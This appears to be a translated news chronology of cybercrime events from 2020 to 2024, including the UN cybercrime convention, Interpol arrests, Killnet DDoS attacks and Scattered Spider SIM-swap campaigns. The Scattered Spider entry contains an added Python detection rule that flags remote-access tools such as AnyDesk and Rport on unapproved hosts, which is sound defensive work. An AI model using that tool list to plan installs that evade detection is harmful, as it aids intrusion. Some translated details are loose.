Main article: Information security
What is cybercrime
Main article: Cybercrime
Cybercrime consists of illegal acts carried out by people using information and telecommunication technologies, computers and computer networks for criminal purposes.
Cybercrime in countries
- Cybercrime and cyber conflicts: Russia
- Cybercrime and cyber conflicts: Ukraine
- Cybercrime and cyber conflicts: US
- Cybercrime and cyber conflicts: Europe
- Cybercrime and cyber conflicts: China
- Cybercrime and cyber conflicts: Israel
- Cybercrime and cyber conflicts: Iran
- Cybercrime and cyber conflicts: India
Cyber wars between countries
Information on agreements on electronic non-aggression, as well as on cyber conflicts between countries, is highlighted in a separate article:
Cybercrime in the commercial sector
An overview of cybercrime events in the banking sector is provided in a separate article:
Losses from cybercrime
An overview of the losses of the global economy from cybercrime in the article:
User Data Rates
Analysis of the working conditions of hackers in the article
Cyber attacks
Types of cyber attacks and overview of key events.
2024
UN adopted a Russian-initiated document coordinating countries in the fight against cybercrime
At a meeting on August 7, a draft UN convention against cybercrime (A/AC.291/L.15) was adopted[1]. It criminalizes ten offenses in cyberspace, allows traffic monitoring and the collection of metadata, and also provides for the creation of a network of state contact centers for exchanging information collected to prove crimes. The text of the convention is only partially agreed: some fragments were adopted by everyone at the vote, some were adopted behind the scenes, and some remain unagreed.
In particular, the agreed types of cybercrime are as follows: illegal interception, impact on the information and communication system, misuse of devices, harassment or creation of a relationship of trust in order to commit a sexual crime against a child and laundering the proceeds of crime.
The offenses that caused disagreement during the adoption of the convention include the following: illegal access, interference with electronic data, forgery using an information and communication system, theft or fraud using an information and communication system, crimes related to posting materials on the Internet depicting the sexual abuse or sexual exploitation of children, and the distribution of intimate images without consent.
"Russia proposed to significantly expand the scope of the convention to include 23 types of offenses," Oleg Shakirov, an analyst at SearchInform and a consultant at the PIR Center, wrote in his Telegram channel. "However, this approach was not shared by all countries: the United States and Europe, actively involved in the work on the document, advocated a narrower coverage, which would be limited to purely computer crimes. Although Russia is the initiator of the development of a new convention, it is not satisfied not only with the narrow scope to which the negotiators eventually came, but also with other points, for example, provisions regarding human rights. The struggle to exclude them went on until the last moment: at the meeting, Iran put to a vote several points with which Russia did not agree."
Indeed, the convention turned out to be strange: of the ten offenses, three relate to the sexual sphere (creating a relationship of trust in order to commit a sexual crime against a child, crimes related to posting materials on the Internet depicting the sexual abuse or sexual exploitation of children, and distributing intimate images without consent). At the same time, there is not a single offense concerning harm to people's lives and property, such as involvement in terrorist activities or incitement to suicide, attacks on critical information infrastructure, the creation, use and distribution of malware, or incitement to subversion. These formulations were listed in the first versions of the convention.
Nevertheless, the adopted draft convention will make it possible to legalize tools for investigating computer crimes at the international level. In particular, the convention permits the following procedural actions: real-time collection of traffic data and the expedited preservation and partial disclosure of traffic data (interception and collection of traffic with provision of this information to law enforcement agencies, in effect the "Yarovaya Law" and SORM), interception of content data (meta-information on transmitted data), search and seizure of stored electronic data, freezing, seizure and confiscation of proceeds of crime, and witness protection.
To carry out all these actions, it is planned to create an international network of contact centers that will interact with each other to assist in the mutual exchange of information needed for the investigation of crimes. These centers must interact in real time, which requires them to operate 24 hours a day without days off. At the same time, such centers, although they may carry out the procedural actions listed above (such as freezing accounts or conducting searches) at the request of other states, still act within the limits of their own state's sovereignty.
"A generally accepted procedure for investigating international incidents did not exist at the moment," Pavel Kuznetsov, director of strategic alliances and interaction with state authorities at the Garda group of companies, told TAdviser. "The Convention is just an attempt to create a foundation for the subsequent concretization of such a procedure. And, as we can see, even at the level of fundamental entities, the very composition of the convention, there are specific contradictions in approaches. In particular, Western 'partners' are trying to narrow the range of offenses in question to those related to 'cybersecurity.' Information security remains outside the zone of attention. And subsequently, such provisions are widely used for 'convenient' interpretation and attempts at deep political influence for purposes that are completely inconsistent with the meaning of the original document."
Indeed, a generally recognized procedure for investigating international cybercrime did not exist until recently: all procedures were carried out privately through direct interaction between the law enforcement units of individual countries. There was no system common to all, and creating one was the main task of the draft convention adopted at the UN level.
"It is gratifying that the document reflected Russian proposals for the creation of a single register of contact points for the exchange of information about cybercrimes," said Pavel Kuznetsov. "The existing mechanisms greatly bureaucratized and slowed down this process, and the allocation of specific responsible units within the relevant bodies is designed to simplify and speed it up. Obviously, such units will be national CERTs: centers for monitoring, countering computer attacks and coordinating relevant areas of activity. It looks optimistic, but we should expect some difficulties."
In fact, contact centers have already been created in some countries. In particular, in Russia the NCCCA is responsible for such activities, as the service that operates the State system of detection, prevention and elimination of consequences of computer attacks. However, similar contact centers do not exist in all participating states, so critical issues remain open for them: personnel, the legislative details of the center's authority within each participating country, and the material and technical base. According to the idea, all of these are to be decided by each country in preparation for ratifying the convention. In this way the criminal law of different countries can be harmonized, which will allow uniform rules for the investigation of cybercrime to be reached.
"The Convention unifies approaches to the suppression and investigation of cybercrimes and to mutual legal assistance at the international level," Yulia Shlychkova, vice president of Kaspersky Lab for government relations, told TAdviser. "Even partial standardization of the legal regulations of different states simplifies the collection and exchange of information on crimes and creates mechanisms for cross-border interaction. In particular, a positive step in this direction is the creation of a network of national contact centers, which in 24/7 mode will maintain communication with each other to suppress and promptly investigate cybercrime and will be able to exchange electronic evidence. One way or another, the convention lays the legal framework for wide international interaction in the fight against cybercrime, but it requires further adjustment and harmonization of technical standards."
The adopted document sets out the following timeline for its entry into force. States can sign the convention until December 31, 2026. Not only individual states can ratify it, but also entire regional economic integration organizations uniting several countries. The convention enters into force 90 days after 40 instruments of ratification have been received from individual states. Thereafter, a Conference of States Parties to the Convention is to be organized to ensure the achievement of the objectives of the Convention and to monitor its observance. The first amendments to the text of the document can be made no earlier than 5 years from the date the convention enters into force.
Fraudsters began to create fake Internet access points on board planes to steal passenger data
In early July 2024, a man in Australia was charged with fraud and theft of aircraft passenger data. Australian Federal Police say the 42-year-old defendant created fake Wi-Fi hotspots at Australian airports and on domestic flights to trick users into entering their personal details. Read more here.
The servers of the South Korean manufacturer of ERP systems have been hacked. Now companies are attacking around the world
On July 1, 2024, the AhnLab SEcurity intelligence Center (ASEC) reported that the servers of an unnamed South Korean manufacturer of ERP systems had been hacked. After the intrusion, attackers began to attack companies around the world, with Korean defense and manufacturing enterprises as the main targets. Read more here.
Hackers in Cambodia, Laos and Myanmar earn 40% of these countries' combined GDP
Southeast Asia has become the center of global cyber attacks. Hackers earn $64 billion a year there, and in Cambodia, Laos and Myanmar the income of cybercriminals reaches $43.8 billion, which corresponds to 40% of the combined GDP of these countries. Such data are given in a study by the United States Institute of Peace (USIP), released in May 2024.
The most popular fraud scheme among swindlers from Southeast Asia is so-called "pig butchering." In this scheme, attackers gain the trust of victims under romantic or financial pretexts and communicate with them for a long time, over several weeks or months. The fraudster's goal is to build at least a friendly, and ideally romantic, relationship with the person.
"In a very short period of time, this problem has turned from regional to global," says Jason Tower, director of the USIP unit in Myanmar. "More countries are facing this fraud. Fraudsters are creating new criminal links in the Middle East and Africa."
A study published in May 2024 said there had been a sharp rise in the number of cyber attacks on non-Chinese speakers in recent months. Perhaps this was the result of the work of the Chinese authorities to control Internet fraud.
Criminal syndicates in Southeast Asia recruit people for online fraud and often force them to do so under the threat of physical violence. Victims of forced labor come from more than 60 countries. In Myanmar, the fraud centers are protected by the armed forces; in Cambodia, criminal structures use hotels and casinos left empty after the pandemic; and in Laos, special economic zones.[3]
2023
Interpol arrested 3,500 people and seized $300 million in 34 countries in the case of a global network of cyber criminals
On December 19, 2023, Interpol announced that 3,500 suspects had been arrested during a large-scale international operation to combat financial crimes on the Internet. At the same time, assets worth approximately $300 million were confiscated in 34 countries.
The anti-crime campaign lasted about six months (from July to December 2023), and Australia, Cambodia, Hong Kong, India, Indonesia, Ireland, Japan, Malaysia, Nigeria, Pakistan, the Philippines, Singapore, South Africa, Spain, Sweden, Thailand, the UAE, Britain, the USA and other states took part. The purpose of the operation was to combat seven types of cyber fraud: voice phishing, romance scams, online extortion, investment crimes, money laundering in the illegal gambling market, business email compromise fraud and e-commerce fraud.
As a result of the measures, law enforcement agencies blocked 82,112 suspicious bank accounts, confiscating a total of $199 million in fiat currency and about $101 million in virtual assets. It is noted that investment fraud, business email compromise and e-commerce fraud accounted for approximately 75% of all incidents investigated.
Working in conjunction with service providers, Interpol helped identify nearly 370 virtual-asset accounts linked to transnational organized crime. Police in different countries have frozen these assets, and the investigation is ongoing as of the end of 2023. During the operation, cooperation between the Philippine and Korean authorities made it possible to arrest a well-known online gambling criminal in Manila; the suspect had been wanted for two years.[4]
How hackers hack hotels into Booking.com and demand money from customers
On December 1, 2023, Panda Security, a company specializing in information security solutions, announced a new cybercriminal scheme, the victims of which are users of the Internet hotel booking system Booking.com. Attackers steal personal data, and then convince customers to make fictitious payments. Read more here.
4 ports in Australia stopped work due to a cyber attack. 30 thousand containers stuck
On November 10, 2023, DP World, Australia's largest port operator, was subjected to a powerful cyber attack that paralyzed its information infrastructure. Fully restoring the systems could take weeks, which, according to experts, will push up prices for a variety of goods in the country, from medicines to Christmas toys. Read more here.
Who and how hackers attack in the Middle East, and why billions of dollars are being pledged there for cybersecurity
The number and complexity of cyber attacks is growing around the world, but there are regional specifics in this area. Representatives of Kaspersky Lab, which has been working in the region for several years, spoke about the features of cybercrime and approaches to protection in the Middle East in October 2023 at the GITEX international exhibition in Dubai, where TAdviser visited.
The head of the Kaspersky Lab research center for the Middle East, Turkey and Africa, Amin Hasbini, noted in a conversation with TAdviser that attacks on corporate users in the region often depend on the size of the organization. In the case of SMBs, they are often aimed at obtaining payments and transfers to "black" accounts used to launder funds in different regions of the world, for example in Asia or Latin America. Ransomware demanding large ransoms is often used against organizations for this purpose.
Attacks on large organizations differ in their approaches. APT attacks (Advanced Persistent Threats) are often used here, which can cause much more damage. Often they are used for espionage. These may apply, for example, to banks or government organizations. And even against hospitals, because they store sensitive medical information about their clients.
Kaspersky Lab calls advanced attacks in the META region (Middle East, Turkey, Africa) the nightmare of users and organizations. This type of attack is characterized by attackers changing their methods and tools to bypass protection, using advanced technical skills and tools to avoid detection, and often organizing the attack so that it goes unnoticed by the victim.
Anton Ivanov, director of research and development at Kaspersky Lab, cited data from his company's investigations showing that countries in the Middle East are the ones most often subjected to advanced attacks in the region. In 2023, the UAE, Egypt, Turkey, Jordan and Syria were among the top 5 most attacked countries. The top 3 attackers in advanced attacks in the region are the hacker groups Lazarus (Andariel, CookieTime, BlueNoroff), the "Kittens" (CharmingKitten, MuddyWater, Lyceum), and Chinese-speaking groups (HoneyMyte, APT15, PlugX, Blackmoule).
One of the oldest and most famous criminal hacker groups operating in the region is OilRig, also known as APT34 and Helix Kitten. It was first spotted in 2012 and is still active, said Anton Ivanov. It predominantly attacks financial, energy, telecommunications and chemical companies.
Amin Hasbini notes a trend: when attacking large businesses in the region, cybercriminals tend to join forces. Sometimes several criminal groups work together: one organizes penetration into the IT infrastructure, another introduces the malware, and a third handles communication, for example for blackmail and the subsequent sale of data.
According to Amin Hasbini, this phenomenon can also be attributed to regional specifics: over the past couple of years, the hiring of hackers to carry out cybercriminal work has been gaining popularity in the Middle East. There are special companies (hack-for-hire) in which you can hire hackers for various tasks. Often they are attracted to competitive intelligence.
For example, there are two competing banks that, at the legal level, through lawyers, attack each other. And one of the banks hires a hacker team to hack into a competitor's systems, find sensitive or "dirty" information that can be used against the company in the future.
"The information received is used to damage the company's reputation, or by lawyers in legal disputes," explains Amin Hasbini.
Of course, this is illegal, but Kaspersky sees a lot of such activity in the Middle East region. A similar use of mercenary hackers can be found in Europe, including in Western organizations, but in the Middle East this type of hacking is very active.
"It is possible that this is due to the fact that the region has very high competition in business," believes Amin Hasbini.
This may also be due to some gaps in the current legislative framework, making it difficult to block and stop the activities of such criminals.
This is not to say that there have been more hackers in the Middle East in recent years, says Amin Hasbini. Rather, regional hackers have come to be characterized by teaming up to perform various tasks. Sometimes similar traits can be noticed in their activities, and then one can assume that they are the same group. One group may attack industrial sites in the region while another attacks financial institutions, for example.
At the same time, IT systems and services in the Middle East have already reached a certain level of maturity, so it has become more difficult for attackers to compromise organizations. But, for example, in the industry in the field of operational technologies (OT), the situation is somewhat different, because for a long time no one has been engaged in cybersecurity in this area. In addition, many industrial systems that are used to supply water, electricity, in the field of atomic energy, etc., are old: they can be 10-20 years old, such systems are not quickly updated. And the damage from cyber attacks here can be huge, because this is a critical infrastructure.
One of the features of the Middle East region compared, for example, to Europe is that information security priorities differ, and individual countries in the Middle East do not always work together on the cybersecurity agenda as closely as EU countries. Essentially, each country seeks to develop its own information security capabilities, explains Amin Hasbini.
At the same time, sovereignty is very important for each country in the Middle East, so they want to deploy their solutions locally. For reasons of sovereignty, countries seek to pass laws that oblige global vendors to localize, so that they have a presence in the country.
Kaspersky Lab itself, for example, has offices in the UAE (here is the headquarters for the entire META region), Turkey and Saudi Arabia. Saudi Arabia has the most stringent requirements for local presence, so Kaspersky Lab also has a transparency center in this country, where customers can familiarize themselves with the source code of products, and use their local computing resources: some servers on their own site, and some from providers. This allows you to store data locally, which is important for local government, and send updates to customers faster.
In addition, penalties for cybercrime are often tougher in the Middle East than in Europe. Cybercrime is taken very seriously there, and the authorities try to catch cybercriminals as quickly as possible. According to Amin Hasbini, Kaspersky Lab interacts with various local security services and shares information with them about cyber attacks to help them find attackers.
Many countries in the region are moving towards raising the maturity of their cyber defenses, they already have legal regimes to protect their states, governments and users from cyber threats. This is a matter of national security. Therefore, they are looking for advanced technologies to provide such protection. Projects in government agencies and on critical infrastructure are now among the largest, Amin Hasbini told TAdviser.
Kaspersky Lab sees the META region as a whole, and the Middle East in particular, as a very promising market. According to ResearchAndMarkets estimates, the cybersecurity market in the Middle East was worth $20.3 billion in 2022, and analysts predict a volume of $44.7 billion in 2027, with an average annual growth of 17.1%.[5]
Rashid Al-Momani, the company's general manager for the Middle East, Egypt, Rwanda and Pakistan, says that large cybersecurity budgets in the Middle East are allocated, among other things, under the influence of geopolitical factors. In addition, in the UAE, various major international events are held, for example in technology and sports, which attract more and more participants and therefore also require better protection.
Taking into account the course towards strengthening cyber defense in the region, Kaspersky Lab is expanding its presence here, including the number of local teams, as well as strategic cooperation with local authorities, regulators, central banks, Rashid Al-Momani notes.
In addition to Kaspersky Lab, other Russian information security vendors are showing growing interest in the Middle East information security market: about 15 stands of companies from Russia were present at GITEX whose descriptions list cybersecurity as their main direction or one of their directions.
1.5 TB of data was stolen from the Argentine financial regulator. Hackers demand a ransom of $500 thousand and promise to destroy the banking system
In June 2023, the Argentine National Securities Commission was the victim of a cyber attack allegedly committed by the hacker group Medusa, which develops ransomware viruses. Hackers demand a large ransom of $500,000 within a week, otherwise threatening to leak 1.5 TB of documents and commission databases to the Internet. Read more here.
Updated Pakistani Trojan ReverseRAT targets Indian government agencies
Information security company ThreatMon has discovered a targeted phishing campaign against Indian government agencies that leads to the deployment of an updated version of the ReverseRAT remote access Trojan. ThreatMon experts attributed this activity to the SideCopy group. This became known on February 21, 2023. Read more here.
Hackers attacked one of Canada's largest energy companies
In mid-January 2023, Canada's major electricity supplier Qulliq Energy was hit by a cyber attack that knocked computers out of service and left its customers unable to pay for services using bank cards. A substation in the city of Nunavut was damaged. Read more here.
APT group Dark Pink strikes Asian government and military structures
The APT group Dark Pink is delivering cyber strikes on Asian government and military structures. This became known on January 11, 2023.
During attacks, hackers use a set of powerful custom tools and new tactics.
In the course of its investigation, Group-IB stressed that Dark Pink could be a completely new APT group. The hacker gang got its name from the names of some of the mailboxes to which the stolen data was sent. Chinese researchers, however, gave it a different name: Saaiwc Group. Read more here.
One of the most complex chains of computer infection in history revealed
On January 5, 2023, Check Point Research (CPR) experts spoke about one of the most complex chains of infection in the history of cyber attacks, which the Blind Eagle group uses to organize attacks on victims in South America. Read more here.
2022
Hackers began to massively attack telecom operators around the world to take possession of someone else's phone number
On December 2, 2022, specialists at CrowdStrike announced the discovery of a new cybercriminal scheme: attackers target telecommunications companies and business process outsourcing (BPO) organizations in order to take possession of someone else's phone number.
The cybercriminal campaign is called Scattered Spider. Experts say the hackers' purpose is to gain access to mobile operators' networks and carry out SIM swap attacks. This method subsequently makes it possible to intercept one-time passwords for financial transactions and thus bypass two-factor authentication. As a result, victims' funds can be stolen.
Various methods can be used to gain initial access to the attacked system. These are, in particular, social engineering schemes, including through phone calls and SMS notifications, as well as messages in instant messengers. Attackers impersonate IT professionals to force victims to enter credentials on a phishing page or download and install a specific remote access tool, such as AnyDesk, BeAnywhere, DWservice, Logmein, ManageEngine, N-Able, Pulseway or Rport. Moreover, cybercriminals use a personalized approach to obtain one-time passwords. In addition, vulnerabilities in the software can be exploited.
After penetrating the target system, the hackers analyze Windows, Linux, Google Workspace, Azure Active Directory, Microsoft 365 and AWS environments. In addition, lateral movement is performed. Additional tools can then be loaded to collect data on VPN parameters and multifactor authentication modules. It is noted that in most cases the attackers act extremely persistently and brazenly.[6]
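One practical detection for the initial-access step described above, the "install this remote access tool" pretext, is to alert on process-creation events for commercial remote-access binaries on hosts whose role is not approved to run them, and to rate the alert higher when the parent process is a browser or the desktop shell (a user-launched download rather than a deployment-tool rollout). The following is an added example, not code from CrowdStrike or from the original report; the JSON log schema, the executable file names and the role-based approval table are all assumptions made for the illustration, and the sample events are constructed.

```python
"""
Detection sketch for the Scattered Spider initial-access pattern: a help-desk
impersonation that ends with the victim installing a commercial remote-access
tool. Scans process-creation events (one JSON object per line) and raises an
alert when a known remote-access binary starts on a host whose role is not
approved to run that tool. Log schema, executable names and the approval
table are assumptions for this example, not any vendor's real format.
"""
import json

# Executable names for the tools named in the article. The file names are
# assumptions; a real deployment should match against a software inventory
# (the code-signing publisher is a sturdier key than a file name).
REMOTE_ACCESS_BINARIES = {
    "anydesk.exe": "AnyDesk",
    "beanywhere.exe": "BeAnywhere",
    "dwagent.exe": "DWService",
    "logmein.exe": "LogMeIn",
    "manageengine.exe": "ManageEngine",
    "nable.exe": "N-Able",
    "pulseway.exe": "Pulseway",
    "rport.exe": "Rport",
}

# A browser, mail client or desktop shell as parent means the user launched the
# binary by hand, which fits the "download and install this tool" pretext far
# better than a rollout by a software-deployment service.
USER_LAUNCH_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe",
                       "explorer.exe", "outlook.exe"}

# Which tools each host role is allowed to run (assumed policy).
APPROVED_TOOLS = {
    "helpdesk": {"ManageEngine"},
    "workstation": set(),
    "server": set(),
}


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(log_text, approved=APPROVED_TOOLS):
    """Return one alert dict per unapproved remote-access tool start."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line; a real pipeline would count these
        tool = REMOTE_ACCESS_BINARIES.get(basename(ev.get("image", "")))
        if tool is None:
            continue  # not a remote-access binary we track
        if tool in approved.get(ev.get("role", ""), set()):
            continue  # sanctioned use for this host role
        parent = basename(ev.get("parent", ""))
        alerts.append({
            "ts": ev.get("ts"),
            "host": ev.get("host"),
            "user": ev.get("user"),
            "tool": tool,
            "parent": parent,
            # a user-launched install is the stronger signal
            "severity": "high" if parent in USER_LAUNCH_PARENTS else "medium",
        })
    return alerts


# Constructed sample events; hosts, users, paths and timestamps are invented.
SAMPLE_EVENTS = [
    {"ts": "2022-11-30T09:12:01Z", "host": "WS-0142", "user": "jdoe",
     "role": "workstation", "parent": "chrome.exe",
     "image": r"C:\Users\jdoe\Downloads\AnyDesk.exe"},
    {"ts": "2022-11-30T09:15:44Z", "host": "HD-07", "user": "helpdesk1",
     "role": "helpdesk", "parent": "services.exe",
     "image": r"C:\Program Files\ManageEngine\ManageEngine.exe"},
    {"ts": "2022-11-30T09:20:03Z", "host": "WS-0142", "user": "jdoe",
     "role": "workstation", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe"},
    {"ts": "2022-11-30T09:25:10Z", "host": "SRV-VPN1", "user": "svc_deploy",
     "role": "server", "parent": "powershell.exe",
     "image": r"C:\Windows\Temp\rport.exe"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(f'{a["severity"]:6} {a["ts"]} {a["host"]} {a["user"]} '
              f'{a["tool"]} (parent {a["parent"]})')
```

Run against the constructed sample, the rule fires twice: a high-severity alert for AnyDesk launched from Chrome on a workstation, and a medium-severity alert for Rport started by PowerShell on a VPN server, while the help desk's sanctioned ManageEngine process and an ordinary Notepad launch are ignored. The role-based allowlist is what keeps such a rule from drowning in noise from legitimate IT use; the parent-process check is what separates the social-engineering case from routine deployments.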
North Korean hacker group Kimsuky attacks South Korean political and diplomatic organizations
According to a Kaspersky Lab report, the North Korean APT group Kimsuky is running a campaign against South Korean political and diplomatic organizations, as well as South Korean university professors, think tank researchers and government officials. This became known on August 25, 2022. Read more here.
The wave of Killnet cyber attacks crashed against Estonian defense systems
The wave of Killnet cyber attacks crashed against Estonian defense systems. This became known on August 19, 2022.
Large-scale DDoS attacks were aimed at state institutions and enterprises in Estonia.
Luukas Kristyan, Deputy Vice Chancellor for Digital Development of the Ministry of Economy and Communications of Estonia, announced large-scale hacker attacks on his Twitter. According to him, these were the most intense cyber attacks since 2007, aimed at both government agencies and the private sector.
At the same time, Luukas noted that the attacks committed by hackers were ineffective.
The head of the Estonian computer emergency response team, Tonu Tammer, clarified that the cyber attacks were aimed, in particular, at the websites of the police, the government and logistics firms, but were able to cause only minor interruptions in the operation of governmental IT systems.
The Killnet group claimed responsibility for the cyber attacks. Hackers said their attack was a response to the dismantling of the T-34 monument in Narva[7].
Albania went offline after a cyber attack
Albania's National Agency for the Information Society (AKSHI, NAIS) has been forced to shut down government online services and government websites following an ongoing cyber attack. This became known on July 18, 2022.
"The national agency is on full alert and is working around the clock with the Microsoft team, the Jones Group International team and groups of Albanian ICT companies to prevent the Albanian IT system from being damaged or compromised," AKSHI added.
The websites of the parliament and the prime minister's office are closed, as is the e-Albania website, a government portal that is meant to be used by all Albanians, as well as foreign residents and investors, to receive public services.[8]
Russian-speaking hackers from Killnet paralyzed the work of several Lithuanian government agencies
Hackers from the Killnet group, who had warned the Lithuanian authorities of upcoming large-scale cyber attacks over the country's blocking of rail transit of goods to the Kaliningrad region, kept their promise and attacked Lithuanian state structures. This became known on June 27, 2022. It is clarified that at the end of June 2022 many Lithuanian state structures are experiencing serious problems in their work; among those that have specifically suffered from the cyber attack are the State Tax Inspectorate, which is part of the Lithuanian Ministry of Finance, the official websites of the largest Lithuanian ports and of oil and gas companies, and the video surveillance system throughout the country. At the same time, some of the attacked sites open, but users cannot obtain any services on them. The Killnet group's Telegram channel says that as a result of a large-scale DDoS attack it was possible to disable more than 1000 Lithuanian sites. The Russian-speaking hackers also presented a screenshot of the main Lithuanian police site indicating that the site was blocked.
"1,089 Lithuanian sites were shut down due to a major glitch that is occurring at the local provider. Which provider, you will learn from official sources," said Killnet.
Foreign media clarify that pro-Russian hackers from Killnet attacked Lithuanian state websites throughout the day. There were problems with the official websites of Lithuanian airports, which could not connect to the systems of financial service providers. Websites of major telecommunication service providers in Lithuania were also affected by the DDoS attack, with some loading unusually slowly and others failing altogether. The National Cyber Security Centre of Lithuania (NCSC) had announced a few days earlier an increase in the number of DDoS attacks against the country, saying that the attackers were targeting government agencies, transport and the financial sector.[9]
Killnet gang announce massive attack on Italy
The Killnet gang has announced a "massive and unprecedented" attack on Italy. This became known on May 30, 2022.
As of the end of May 2022, the attacks had not caused problems for Italian organizations.
The pro-Russian hacktivist group Killnet is one of the most active non-state structures operating since the beginning of the special operation in Ukraine. Researchers from CyberKnow have published a chronology of the attacks conducted by the hacktivists.
CyberKnow believes the hackers have merged into a semi-formal structured organization, the KillNet Order of Battle (ORBAT), with different levels of command and tasking.
"The analysis suggests that, regardless of the sophistication of the attacks, the criminals have a reliable command and control structure," according to CyberKnow.
One of the main targets of the group is Italy. The group called its members to action by giving them a list of Italian targets, including banks, media, power companies and more. Only three governmental websites were unavailable during the first wave of attacks.
Now the group has announced a massive attack on Italy, scheduled for the 30th at 05:00, with the gang also threatening the hacktivists Anonymous.
The following are messages published by Killnet on Telegram:
The Italian CSIRT has issued a warning that signs and threats of possible imminent attacks remain, in particular against national public organizations, private critical infrastructure organizations, or private organizations whose image is identified with the country.[10]
Russian hackers suspected of cyber attacks on German renewable power companies
Three German renewable power companies have been hacked in connection with the countries' rejection of Russian oil. This became known on April 27, 2022. Read more here.
RaidForums hacker forum for trading stolen databases closed
The US authorities blocked the work of RaidForums, a forum where stolen data was traded online. This is stated in a statement by the US Department of Justice, issued on April 12, 2022. The site was shut down by law enforcement agencies in the United States, United Kingdom, Sweden, Portugal and Romania in Operation TOURNIQUET, coordinated by Europol.
The US authorities have charged the founder and chief administrator of the forum, 21-year-old Diogo Santos Coelho from Portugal. He was detained on January 31 in the UK at the request of the American side. The U.S. Department of Justice is seeking his extradition, after which he will appear in U.S. District Court for the Eastern District of Virginia. Charges have been filed against Coelho on six counts, including conspiracy, fraudulently accessing devices and aggravated identity theft, over his alleged role as RaidForums' chief administrator between January 1, 2015 and January 31, 2022. According to the investigation, the accused and his possible accomplices developed and administered the software and computer infrastructure of the platform, established rules for users, and also advertised RaidForums' illegal services.
The department said it received court approval to seize three different domain names that host the RaidForums website: raidforums.com, Rf.ws and Raid.lol.
According to the US Department of Justice, "hundreds of databases" containing stolen information were previously sold using RaidForums. The site sold stolen information used to access bank accounts, credit card information, login credentials and social security numbers.
The size of the RaidForums market, according to the US Department of Justice, included hundreds of such databases containing more than 10 billion units of credentials of individuals living in the United States and other states.
Along with the illegal data trade, from the founding of the forum in 2015 RaidForums was a platform for organizing and supporting online harassment, in the form of suppressing the operation of victims' communication devices by transmitting an overwhelming stream of data, or the practice of falsely notifying law enforcement agencies of alleged situations requiring immediate significant or even armed intervention from such bodies.[11]
2021
Interpol conducted the largest operation to detain cybercriminals
At the end of November 2021, Interpol conducted a large-scale operation to detain cybercriminals. During the operation, law enforcement agencies in more than 20 countries arrested more than 1,000 people and intercepted about $27 million in illegal funds as part of the fight against financial crimes using cyber technologies.
The operation, codenamed HAECHI-II, took place from June to September 2021. It was attended by specialized police units from 20 countries, including Hong Kong and Macau, which dealt with specific types of Internet fraud, such as romantic scams, investment fraud and money laundering related to illegal gambling on the Internet. As a result of this special operation, 1,000 people were arrested, and investigators closed 1.6 thousand cases. 2.3 thousand bank accounts related to illegal proceeds from financial crimes were blocked and 10 new criminal methods of work were identified. During the operation, Interpol staff tested a new global payment termination mechanism, the Rapid Response Anti-Money Laundering Protocol (ARRP), which proved crucial for successfully intercepting illicit funds in several cases in Operation HAECHI-II.
This is the second such operation in the framework of a project launched in 2019 to combat financial crimes using cyber technologies with the participation of Interpol member countries on all continents. Interpol plans to officially launch ARRP in 2022. For November 2021, its Financial Crime Unit is working with member countries to integrate the system into existing communication channels.
Only through this level of global cooperation and coordination can national law enforcement agencies effectively combat a parallel cybercrime pandemic. Using the new ARRP network, channels of international police cooperation were deployed between Interpol's bureaus in Bogota, Beijing and Hong Kong to freeze the transferred funds... more than 94% of the money was intercepted in record time, said Interpol Secretary General Jurgen Stock. |
Interpol reported that a well-known textile company in Colombia was defrauded of more than $8 million through a complex business email compromise scam. Posing as the legal representative of the company, the criminals ordered more than $16 million to be transferred to two Chinese bank accounts. Half of the money was transferred before the company discovered the fraud and alerted the local judiciary, which contacted Interpol's financial crime unit through its National Central Bureau (NCB).[12]
South Korea has become a global center for digital sex blackmail
In mid-June 2021, it became known that the advanced technologies of South Korea caused a whole wave of digital crimes in the field of sex blackmail. The country has become a global hub for illegal filming and sharing of explicit images and videos, according to victims, researchers and rights groups. Read more here.
2020
Group-IB helped Interpol identify Nigerian criminals who attacked companies around the world
On November 25, 2020, Group-IB, an international company specializing in preventing cyber attacks, took part in Interpol's Falcon operation to curb the activities of cybercriminals from Nigeria.
The group, named TMT by Group-IB specialists, carried out massive hacks of corporate mail for several years and stole user authentication data from browsers, email and FTP servers, including for sale.
Criminals operating since at least 2017 have compromised at least 500,000 public and private companies in more than 150 countries, including Russia. Three cybercriminals were arrested in Lagos as a result of a cross-border operation involving Interpol's Cybercrime Directorate, Nigeria Police and Group-IB (International Cybercrime Investigation Unit, Singapore). The investigation continues, some members of the criminal group remain at large for November 2020.
The group was engaged in BEC (business email compromise) attacks, a type of phishing attack based on social engineering. Phishing emails can be targeted at certain employees of an organization or sent out en masse. They often disguise themselves as money transfer requests, messages from the HR department or commercial offers and are designed to steal sensitive data.
Three members of the group, known by the initials "OC" (32 years), "IO" (34 years) and "OI" (35 years), whose identities were established through the use of Group-IB cybercriminal tracking technologies, as well as the operational work of the Group-IB international investigation team and the CERT-GIB Cyber Security Incident Response Centre, were arrested in Lagos by the Nigerian Cyber Police Unit as part of Operation Falcon. According to representatives of the Nigerian police, the information found on the devices of the arrested members of the TMT group confirmed their involvement in the criminal scheme and contained data belonging to at least 50 thousand victims.
Information about the alleged attackers that Group-IB was able to track was transferred to the Interpol Cybercrime Office.
To send phishing emails, the attackers used the Gammadyne Mailer and Turbo-Mailer tools. In addition, they used the MailChimp platform to see if the victim had opened the received message.
To avoid detection and tracking by traditional security systems, the group used public cryptors. To communicate with the command server, the attackers used, in particular, the SMTP, FTP and HTTP protocols.
Parliament website hacked in Kyrgyzstan
The Kyrgyz parliament announced the hacking of its official website and the demand of the hackers The Black Pirate for $10 thousand as a ransom. This became known on October 19, 2020. Read more here.
Hacking major DNA databases, stealing genealogical profiles
At the end of July 2020, it became known that the GEDmatch DNA database, which allows users to search for relatives based on DNA data, was hacked. The hackers used the received email addresses in a phishing attack on another leading genealogy site, MyHeritage. Read more here.
Germany announced an international search for a Russian accused of cyber attacks on the Bundestag
